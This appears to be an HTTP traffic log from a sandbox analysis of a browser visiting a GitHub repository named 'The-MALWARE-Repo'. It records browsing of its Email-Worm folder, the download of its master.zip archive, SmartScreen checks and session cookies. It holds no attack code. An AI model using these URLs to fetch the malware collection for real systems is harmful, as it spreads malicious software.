notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 632
x-github-request-id: 30B4:76FE2:60284:7CA52:67D0F2D9
GET

https://github.com/Da2dalus/The-MALWARE-Repo/branch-and-tag-count

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/branch-and-tag-count HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:05 GMT
content-type: application/manifest+json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: max-age=604800, public
etag: W/"c75e05794d72230a695e880f1a6c83a4"
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 474
x-github-request-id: 30B4:76FE2:602A7:7CA78:67D0F2D9
GET

https://github.com/manifest.json

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /manifest.json HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:05 GMT
content-type: text/plain; charset=utf-8
content-length: 0
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
cache-control: no-cache
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
accept-ranges: bytes
x-github-request-id: 30B4:76FE2:60272:7CA37:67D0F2D9
GET

https://github.com/Da2dalus/The-MALWARE-Repo/archive/refs/heads/master.zip

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/archive/refs/heads/master.zip HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 302

server: GitHub.com
date: Wed, 12 Mar 2025 02:35:12 GMT
content-type: text/html; charset=utf-8
content-length: 0
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
location: https://codeload.github.com/Da2dalus/The-MALWARE-Repo/zip/refs/heads/master
cache-control: max-age=0, private
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
x-github-request-id: 30B4:76FE2:60598:7CE54:67D0F2D9
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.11.108.188:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiWGRrNG82bUZSL0E9Iiwia2V5IjoibzVLQm8xNHYyL2VEOWtEK2ZWSWQxZz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 2010
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 02:35:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 858
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.11.108.188:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiOVQwd2gyelhZdjg9Iiwia2V5IjoiT3NhMlBkckg1RjQ1Mm1QMU5Kckxqdz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 2111
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 02:35:12 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 965
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/download/2

msedge.exe

Remote address:

51.11.108.188:443

Request

POST /api/browser/edge/download/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiVVBtT0xtdTdyeGM9Iiwia2V5IjoiTWNMamJKTDVCaGprT2dMbnVOUDlOZz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 2128
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 02:35:13 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 942
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/actions

msedge.exe

Remote address:

51.11.108.188:443

Request

POST /api/browser/edge/actions HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiMG1aRkNEeU1tSzA9Iiwia2V5IjoiYjBlVFA5eTZlWi9pelFnUkxubDFIZz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 1606
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 02:35:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 192
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.11.108.188:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiSEtFSFcrSm5JQzQ9Iiwia2V5Ijoid0NHT2tjdWdTanhNQVpjV1haUjBqZz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 2215
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 02:35:12 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 937
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
POST

https://nav.smartscreen.microsoft.com/api/browser/edge/navigate/2

msedge.exe

Remote address:

51.11.108.188:443

Request

POST /api/browser/edge/navigate/2 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/json
Authorization: SmartScreenHash eyJhdXRoSWQiOiIzODFkZGQxZS1lNjAwLTQyZGUtOTRlZC04YzM0YmY3M2YxNmQiLCJoYXNoIjoiMGhtWUR5V0FYU0E9Iiwia2V5IjoieUlycVRTVE5EN29XSVAvZ2hpM2Fndz09In0=
User-Agent: SmartScreen/281479409434625
Content-Length: 2049
Host: nav.smartscreen.microsoft.com

Response

HTTP/1.1 200 OK

Date: Wed, 12 Mar 2025 02:35:14 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 952
Connection: keep-alive
Server: Kestrel
Cache-Control: max-age=0, private
Request-Context: appId=cid-v1:365e21c6-df19-4b1c-a612-b572489ace31
GET

https://avatars.githubusercontent.com/u/63458929?s=64&v=4

msedge.exe

Remote address:

185.199.111.133:443

Request

GET /u/63458929?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=300
content-security-policy: default-src 'none'
content-type: image/png
etag: "e25efc2f3c542a995df70f85198b7fd6184be4700ec9756e00c0a8fd9e7a124c"
last-modified: Tue, 03 Mar 2015 00:30:49 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: EBA4:302EEA:5683FC:CD0DA4:67C6BB3A
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600093-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1741746905.623211,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 58ab14fcfeaf3efe796d7c80181b6cc1620ee7d0
expires: Wed, 12 Mar 2025 02:40:04 GMT
source-age: 669597
vary: Authorization,Accept-Encoding
content-length: 1505
GET

https://avatars.githubusercontent.com/u/123590232?s=64&v=4

msedge.exe

Remote address:

185.199.111.133:443

Request

GET /u/123590232?s=64&v=4 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=300
content-security-policy: default-src 'none'
content-type: image/jpeg
etag: "1d9f1acf397d81e762e9ede9d36dd95eb2e889d8dc41c4f240aa17ffcd5ff02f"
last-modified: Thu, 20 Jul 2023 19:54:24 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: FBB3:3BCDE3:B45F2:1AE6F7:67CC6E45
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600093-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1741746905.623310,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 9394d664d15e72b87d6a751b764d493670e3e92c
expires: Wed, 12 Mar 2025 02:40:04 GMT
source-age: 296078
vary: Authorization,Accept-Encoding
content-length: 1266
GET

https://avatars.githubusercontent.com/u/63458929?v=4&size=40

msedge.exe

Remote address:

185.199.111.133:443

Request

GET /u/63458929?v=4&size=40 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=300
content-security-policy: default-src 'none'
content-type: image/png
etag: "e25efc2f3c542a995df70f85198b7fd6184be4700ec9756e00c0a8fd9e7a124c"
last-modified: Sat, 07 Mar 2015 10:39:57 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: BA4E:13BA8F:2EA90D:6B1249:67CC6E4B
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600093-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1741746906.979858,VS0,VE1
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 401bb1e196e7f0986a46a52587410866a1b3447f
expires: Wed, 12 Mar 2025 02:40:05 GMT
source-age: 296079
vary: Authorization,Accept-Encoding
content-length: 1505
GET

https://avatars.githubusercontent.com/u/123590232?v=4&size=40

msedge.exe

Remote address:

185.199.111.133:443

Request

GET /u/123590232?v=4&size=40 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo/tree/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=300
content-security-policy: default-src 'none'
content-type: image/jpeg
etag: "7092780138ee29ef74ab07ab33208aed411686853b3bcef4814b6c7687153094"
last-modified: Thu, 20 Jul 2023 19:54:24 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 4B36:1F2ECE:FA9FE:2080C9:67D0F306
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:51 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600093-LCY
x-cache: MISS
x-cache-hits: 0
x-timer: S1741746951.391115,VS0,VE127
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 6ba152ee547fa21f70b40bb03169c0bc8a4ad225
expires: Wed, 12 Mar 2025 02:40:51 GMT
source-age: 0
vary: Authorization,Accept-Encoding
content-length: 1014
GET

https://avatars.githubusercontent.com/u/123590232?v=4&size=32

msedge.exe

Remote address:

185.199.111.133:443

Request

GET /u/123590232?v=4&size=32 HTTP/2.0
host: avatars.githubusercontent.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=300
content-security-policy: default-src 'none'
content-type: image/png
etag: "e25efc2f3c542a995df70f85198b7fd6184be4700ec9756e00c0a8fd9e7a124c"
last-modified: Tue, 24 Feb 2015 08:40:04 GMT
strict-transport-security: max-age=31557600
timing-allow-origin: https://github.com
x-content-type-options: nosniff
x-frame-options: deny
x-github-tenant:
x-xss-protection: 1; mode=block
x-github-request-id: 2BC9:39D93E:38D31E:8B9F88:67BC5C85
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:36:32 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600093-LCY
x-cache: HIT
x-cache-hits: 0
